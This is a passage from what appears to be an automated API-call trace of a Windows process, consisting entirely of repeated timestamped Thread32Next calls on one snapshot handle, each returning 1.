lpte=0x14fe78) returned 1 [0220.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.602] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.603] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.604] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.604] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.605] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.026] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.027] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.027] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.028] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.029] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.030] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.030] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.751] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.751] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.752] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.752] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.753] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.754] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.754] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.755] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.756] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.756] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.757] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.757] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.758] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.758] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.759] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.759] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.760] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.761] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.761] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.762] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.762] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.763] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.763] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.764] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.764] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.765] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.765] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.766] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.102] Thread32Next 